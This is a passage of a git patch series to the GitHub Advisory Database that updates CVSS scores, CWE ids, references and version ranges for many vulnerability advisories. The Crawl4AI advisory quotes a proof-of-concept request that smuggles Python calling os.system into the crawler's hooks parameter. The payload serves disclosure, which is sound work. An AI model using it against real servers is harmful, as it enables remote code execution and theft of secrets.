"2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-67135" ], "details": "Weak Security in the PF-50 1.2 keyfob of PGST PG107 Alarm System 1.25.05.hf allows attackers to compromise access control via a code replay attack.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-294" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-r647-2xmg-2cg7/GHSA-r647-2xmg-2cg7.json b/advisories/unreviewed/2026/02/GHSA-r647-2xmg-2cg7/GHSA-r647-2xmg-2cg7.json index 5672b094d178c..722442f255fe2 100644 --- a/advisories/unreviewed/2026/02/GHSA-r647-2xmg-2cg7/GHSA-r647-2xmg-2cg7.json +++ b/advisories/unreviewed/2026/02/GHSA-r647-2xmg-2cg7/GHSA-r647-2xmg-2cg7.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json b/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json index 05ed090a571ef..ac25a86510244 100644 --- a/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json +++ b/advisories/unreviewed/2026/02/GHSA-r942-7mj9-p58w/GHSA-r942-7mj9-p58w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r942-7mj9-p58w", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T18:30:23Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20663" ], "details": "The issue was resolved by sanitizing logging. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An app may be able to enumerate a user's installed apps.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json b/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json index 322ab7c02de2d..8481941575656 100644 --- a/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json +++ b/advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rj79-m8w5-gpw8", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T21:30:40Z", "aliases": [ "CVE-2026-2320" ], "details": "Inappropriate implementation in File input in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T19:15:52Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json b/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json index 1d0209337f45e..df82f7579b660 100644 --- a/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json +++ b/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rmgp-99fm-wv32", - "modified": "2026-02-12T12:31:00Z", + "modified": "2026-02-12T18:30:23Z", "published": "2026-02-12T12:31:00Z", "aliases": [ "CVE-2025-15574" ], "details": "When connecting to the Solax Cloud MQTT server the username is the \"registration number\", which is the 10 character string printed on the SolaX Power Pocket device / the QR code on the device. The password is derived from the \"registration number\" using a proprietary XOR/transposition algorithm. Attackers with the knowledge of the registration numbers can connect to the MQTT server and impersonate the dongle / inverters.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-330" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T11:15:49Z" diff --git a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json index ea18f7e4b6aa5..4d5790a195744 100644 --- a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json +++ b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v9g2-54rr-mxmg", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T18:30:23Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20661" ], "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -25,7 +30,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json b/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json index 432e24181ad57..55d1065a4f5fd 100644 --- a/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json +++ b/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vf98-8xxx-fp8w", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-66274" ], "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQuTS hero h5.3.2.3354 build 20251225 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json b/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json index 9d8d6bf294653..941324951717b 100644 --- a/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json +++ b/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xmr6-mm5f-8mf2", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-59386" ], "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQuTS hero h5.3.2.3354 build 20251225 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json new file mode 100644 index 0000000000000..43ef0684817b8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp6f-p933-2gqg", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2026-26214" + ], + "details": "Galaxy FDS Android SDK (XiaoMi/galaxy-fds-sdk-android) version 3.0.8 and prior disable TLS hostname verification when HTTPS is enabled (the default configuration). In GalaxyFDSClientImpl.createHttpClient(), the SDK configures Apache HttpClient with SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER, which accepts any valid TLS certificate regardless of hostname mismatch. Because HTTPS is enabled by default in FDSClientConfiguration, all applications using the SDK with default settings are affected. This vulnerability allows a man-in-the-middle attacker to intercept and modify SDK communications to Xiaomi FDS cloud storage endpoints, potentially exposing authentication credentials, file contents, and API responses. The XiaoMi/galaxy-fds-sdk-android open source project has reached end-of-life status.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26214" + }, + { + "type": "WEB", + "url": "https://github.com/XiaoMi/galaxy-fds-sdk-android" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/xiaomi-galaxy-fds-android-sdk-tls-hostname-verification-disabled-enables-mitm" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-297" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T16:16:17Z" + } +} \ No newline at end of file From 436b3117bc9430a601b2389fdfd188b73a1d484b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 19:21:53 +0000 Subject: [PATCH 043/215] Publish GHSA-436v-jg82-p533 --- .../2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json b/advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json index 3358747da2cc2..bd010abca06e9 100644 --- a/advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json +++ b/advisories/github-reviewed/2026/02/GHSA-436v-jg82-p533/GHSA-436v-jg82-p533.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-436v-jg82-p533", - "modified": "2026-02-12T18:28:29Z", + "modified": "2026-02-12T19:19:53Z", "published": "2026-02-10T18:30:42Z", "aliases": [ "CVE-2026-21531" ], "summary": "Azure AI Language Authoring Elevation of Privilege Vulnerability can Lead to RCE", - "details": "Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.", + "details": "Deserialization of untrusted data in the Azure AI Language Conversations Authoring client library for Python allows an unauthorized attacker to execute code over a network.", "severity": [ { "type": "CVSS_V3", From dbc775fe884b76f38dccf1d12b45c5ad05d6c502 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 19:53:03 +0000 Subject: [PATCH 044/215] Publish GHSA-r8w2-w357-9pjv --- .../2026/01/GHSA-r8w2-w357-9pjv/GHSA-r8w2-w357-9pjv.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-r8w2-w357-9pjv/GHSA-r8w2-w357-9pjv.json b/advisories/github-reviewed/2026/01/GHSA-r8w2-w357-9pjv/GHSA-r8w2-w357-9pjv.json index 749034be0d356..1c62e2f7e2289 100644 --- a/advisories/github-reviewed/2026/01/GHSA-r8w2-w357-9pjv/GHSA-r8w2-w357-9pjv.json +++ b/advisories/github-reviewed/2026/01/GHSA-r8w2-w357-9pjv/GHSA-r8w2-w357-9pjv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r8w2-w357-9pjv", - "modified": "2026-01-28T18:23:28Z", + "modified": "2026-02-12T19:51:02Z", "published": "2026-01-20T18:31:57Z", "aliases": [ "CVE-2025-64087" @@ -28,7 +28,7 @@ "introduced": "0" }, { - "last_affected": "2.1.0" + "fixed": "2.2.0" } ] } From 75945b50c8db1ff4b8b12056e3e633f4de97c368 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 20:09:23 +0000 Subject: [PATCH 045/215] Publish Advisories GHSA-w7fw-mjwx-w883 GHSA-w8v5-vhqr-4h9v --- .../2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json | 4 ++-- .../2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json | 3 ++- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json b/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json index cb54163c293f7..361640da8f25e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json +++ b/advisories/github-reviewed/2026/02/GHSA-w7fw-mjwx-w883/GHSA-w7fw-mjwx-w883.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w7fw-mjwx-w883", - "modified": "2026-02-12T17:04:39Z", + "modified": "2026-02-12T20:07:59Z", "published": "2026-02-12T17:04:39Z", "aliases": [ "CVE-2026-2391" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "6.7.0" }, { "fixed": "6.14.2" diff --git a/advisories/github-reviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json b/advisories/github-reviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json index 849220257b52b..4e3052f215357 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json +++ b/advisories/github-reviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json @@ -51,7 +51,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-502" + "CWE-502", + "CWE-94" ], "severity": "MODERATE", "github_reviewed": true, From 3c99d6f51e75b7bd8c14b0fe6be6c5836eb37016 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 20:11:12 +0000 Subject: [PATCH 046/215] Publish Advisories GHSA-5882-5rx9-xgxp GHSA-vx9w-5cx4-9796 --- .../GHSA-5882-5rx9-xgxp.json | 20 +++++++++++++---- .../GHSA-vx9w-5cx4-9796.json | 22 ++++++++++++++++--- 2 files changed, 35 insertions(+), 7 deletions(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-5882-5rx9-xgxp/GHSA-5882-5rx9-xgxp.json b/advisories/github-reviewed/2026/01/GHSA-5882-5rx9-xgxp/GHSA-5882-5rx9-xgxp.json index 0a604006f7da5..a8194e7dcd1c3 100644 --- a/advisories/github-reviewed/2026/01/GHSA-5882-5rx9-xgxp/GHSA-5882-5rx9-xgxp.json +++ b/advisories/github-reviewed/2026/01/GHSA-5882-5rx9-xgxp/GHSA-5882-5rx9-xgxp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5882-5rx9-xgxp", - "modified": "2026-02-12T15:52:46Z", + "modified": "2026-02-12T20:09:29Z", "published": "2026-01-16T20:59:16Z", "aliases": [ "CVE-2026-26216" @@ -10,8 +10,8 @@ "details": "A critical remote code execution vulnerability exists in the Crawl4AI Docker API deployment. The `/crawl` endpoint accepts a `hooks` parameter containing Python code that is executed using `exec()`. The `__import__` builtin was included in the allowed builtins, allowing attackers to import arbitrary modules and execute system commands.\n\n**Attack Vector:**\n```json\nPOST /crawl\n{\n \"urls\": [\"https://example.com\"],\n \"hooks\": {\n \"code\": {\n \"on_page_context_created\": \"async def hook(page, context, **kwargs):\\n __import__('os').system('malicious_command')\\n return page\"\n }\n }\n}\n```\n\n### Impact\n\nAn unauthenticated attacker can:\n- Execute arbitrary system commands\n- Read/write files on the server\n- Exfiltrate sensitive data (environment variables, API keys)\n- Pivot to internal network services\n- Completely compromise the server\n\n### Mitigation\n\n1. **Upgrade to v0.8.0** (recommended)\n2. If unable to upgrade immediately:\n - Disable the Docker API\n - Block `/crawl` endpoint at network level\n - Add authentication to the API\n\n### Fix Details\n\n1. Removed `__import__` from `allowed_builtins` in `hook_manager.py`\n2. Hooks disabled by default (`CRAWL4AI_HOOKS_ENABLED=false`)\n3. Users must explicitly opt-in to enable hooks\n\n### Credits\n\nDiscovered by Neo by ProjectDiscovery (https://projectdiscovery.io)", "severity": [ { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" } ], "affected": [ @@ -40,10 +40,18 @@ "type": "WEB", "url": "https://github.com/unclecode/crawl4ai/security/advisories/GHSA-5882-5rx9-xgxp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26216" + }, { "type": "PACKAGE", "url": "https://github.com/unclecode/crawl4ai" }, + { + "type": "WEB", + "url": "https://github.com/unclecode/crawl4ai/blob/main/docs/blog/release-v0.8.0.md" + }, { "type": "WEB", "url": "https://github.com/unclecode/crawl4ai/blob/release/v0.8.0/docs/blog/release-v0.8.0.md" @@ -51,6 +59,10 @@ { "type": "WEB", "url": "https://github.com/unclecode/crawl4ai/blob/release/v0.8.0/docs/migration/v0.8.0-upgrade-guide.md" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/crawl4ai-docker-api-unauthenticated-remote-code-execution-via-hooks-parameter" } ], "database_specific": { @@ -60,6 +72,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-01-16T20:59:16Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T16:16:17Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/01/GHSA-vx9w-5cx4-9796/GHSA-vx9w-5cx4-9796.json b/advisories/github-reviewed/2026/01/GHSA-vx9w-5cx4-9796/GHSA-vx9w-5cx4-9796.json index 3241e6fcbce22..f5c29fbf8ea40 100644 --- a/advisories/github-reviewed/2026/01/GHSA-vx9w-5cx4-9796/GHSA-vx9w-5cx4-9796.json +++ b/advisories/github-reviewed/2026/01/GHSA-vx9w-5cx4-9796/GHSA-vx9w-5cx4-9796.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vx9w-5cx4-9796", - "modified": "2026-02-12T15:53:27Z", + "modified": "2026-02-12T20:09:06Z", "published": "2026-01-16T20:58:51Z", "aliases": [ "CVE-2026-26217" @@ -12,6 +12,10 @@ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" } ], "affected": [ @@ -40,10 +44,18 @@ "type": "WEB", "url": "https://github.com/unclecode/crawl4ai/security/advisories/GHSA-vx9w-5cx4-9796" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26217" + }, { "type": "PACKAGE", "url": "https://github.com/unclecode/crawl4ai" }, + { + "type": "WEB", + "url": "https://github.com/unclecode/crawl4ai/blob/main/docs/blog/release-v0.8.0.md" + }, { "type": "WEB", "url": "https://github.com/unclecode/crawl4ai/blob/release/v0.8.0/docs/blog/release-v0.8.0.md" @@ -51,15 +63,19 @@ { "type": "WEB", "url": "https://github.com/unclecode/crawl4ai/blob/release/v0.8.0/docs/migration/v0.8.0-upgrade-guide.md" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/crawl4ai-docker-api-local-file-inclusion-via-file-url-handling" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-01-16T20:58:51Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T16:16:17Z" } } \ No newline at end of file From 4113c1704faa2fcacba9f2fe500c4c44992ead7b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 20:26:39 +0000 Subject: [PATCH 047/215] Publish GHSA-vx5f-vmr6-32wf --- .../2026/02/GHSA-vx5f-vmr6-32wf/GHSA-vx5f-vmr6-32wf.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-vx5f-vmr6-32wf/GHSA-vx5f-vmr6-32wf.json b/advisories/github-reviewed/2026/02/GHSA-vx5f-vmr6-32wf/GHSA-vx5f-vmr6-32wf.json index 14e6bbcc36d8a..aba8dd22e920e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-vx5f-vmr6-32wf/GHSA-vx5f-vmr6-32wf.json +++ b/advisories/github-reviewed/2026/02/GHSA-vx5f-vmr6-32wf/GHSA-vx5f-vmr6-32wf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vx5f-vmr6-32wf", - "modified": "2026-02-10T14:33:50Z", + "modified": "2026-02-12T20:25:16Z", "published": "2026-02-10T14:33:50Z", "aliases": [], "summary": "cap-go/capacitor-native-biometric Authentication Bypass", @@ -9,7 +9,7 @@ "severity": [ { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" + "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" } ], "affected": [ From 4c646c78bb4b8c9fc3c893f196c205804f0f0eb5 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 21:32:46 +0000 Subject: [PATCH 048/215] Advisory Database Sync --- .../GHSA-m786-h9gp-8q53.json | 6 ++- .../GHSA-h3c8-rqv3-223w.json | 3 +- .../GHSA-m83h-48rr-jcrh.json | 10 +++- .../GHSA-mwgm-j9q4-3cm5.json | 3 +- .../GHSA-25q2-mm9v-fcj8.json | 15 ++++-- .../GHSA-26vr-h5vf-58cq.json | 11 ++-- .../GHSA-355c-f243-w6f5.json | 4 +- .../GHSA-3993-26cm-wfhm.json | 15 ++++-- .../GHSA-3p5c-6wpr-gh3w.json | 11 ++-- .../GHSA-3qgp-4ccx-9wvf.json | 44 ++++++++++++++++ .../GHSA-3v9p-vgm5-cgm3.json | 6 ++- .../GHSA-59g4-3crj-9w92.json | 6 ++- .../GHSA-682g-84mv-mcxh.json | 6 ++- .../GHSA-74vw-h65p-vr44.json | 11 ++-- .../GHSA-76mg-x9r8-w496.json | 6 ++- .../GHSA-77vc-xm5w-w2vq.json | 15 ++++-- .../GHSA-79w3-8jvg-fr55.json | 48 +++++++++++++++++ .../GHSA-8258-fr2h-jgx8.json | 15 ++++-- .../GHSA-8863-jvcv-whf3.json | 6 ++- .../GHSA-934f-cmh4-43m7.json | 15 ++++-- .../GHSA-946c-234f-fccx.json | 15 ++++-- .../GHSA-96g7-r737-95hv.json | 15 ++++-- .../GHSA-c6jr-3394-hq95.json | 15 ++++-- .../GHSA-cpw4-rfmm-h598.json | 11 ++-- .../GHSA-cqx4-h5ph-3xj9.json | 10 +++- .../GHSA-cx65-rpp3-qf6c.json | 15 ++++-- .../GHSA-f3h2-q66h-c9wp.json | 15 ++++-- .../GHSA-g4c6-xx88-2hqq.json | 6 ++- .../GHSA-h3fv-27fp-2c8j.json | 6 ++- .../GHSA-h7qq-mch4-gjx3.json | 6 ++- .../GHSA-j33g-vgfm-6pxv.json | 15 ++++-- .../GHSA-j5x8-2r52-c3ff.json | 6 ++- .../GHSA-jhp8-jfxv-5ggj.json | 15 ++++-- .../GHSA-mcfq-f994-8hqg.json | 6 ++- .../GHSA-p8ww-f2v2-hj7q.json | 15 ++++-- .../GHSA-p94w-qfcw-pq69.json | 6 ++- .../GHSA-pjf9-xcq9-w388.json | 6 ++- .../GHSA-pxhf-qg7h-8x8m.json | 15 ++++-- .../GHSA-q6f4-2qxx-8cww.json | 37 +++++++++++++ .../GHSA-q7w4-8rgm-gmv2.json | 52 +++++++++++++++++++ .../GHSA-qg3j-47pf-jpxw.json | 36 +++++++++++++ .../GHSA-qjg6-3whf-x8q9.json | 48 +++++++++++++++++ .../GHSA-qjq9-mpcc-f8cr.json | 15 ++++-- .../GHSA-qq4x-5chw-w95x.json | 48 +++++++++++++++++ .../GHSA-qr83-6r38-ch55.json | 15 ++++-- .../GHSA-qrx6-r62c-hcv3.json | 40 ++++++++++++++ .../GHSA-r8m3-w58q-qp9h.json | 44 ++++++++++++++++ .../GHSA-rgrq-m353-3wqj.json | 40 ++++++++++++++ .../GHSA-rh68-c6m2-cjhj.json | 52 +++++++++++++++++++ .../GHSA-rq5p-55rh-7hgc.json | 6 ++- .../GHSA-w2vm-pjj6-6q8j.json | 48 +++++++++++++++++ .../GHSA-w6g5-6qxq-f96f.json | 6 ++- .../GHSA-w82w-6f63-rvgf.json | 11 ++-- .../GHSA-wqpg-jwpg-g42c.json | 11 ++-- .../GHSA-x4qx-g5c7-vgmf.json | 6 ++- .../GHSA-x6mf-6c4h-p75j.json | 6 ++- .../GHSA-xw8j-p597-rjrj.json | 11 ++-- 57 files changed, 879 insertions(+), 107 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-3qgp-4ccx-9wvf/GHSA-3qgp-4ccx-9wvf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-79w3-8jvg-fr55/GHSA-79w3-8jvg-fr55.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q6f4-2qxx-8cww/GHSA-q6f4-2qxx-8cww.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q7w4-8rgm-gmv2/GHSA-q7w4-8rgm-gmv2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qg3j-47pf-jpxw/GHSA-qg3j-47pf-jpxw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qjg6-3whf-x8q9/GHSA-qjg6-3whf-x8q9.json create mode 100644 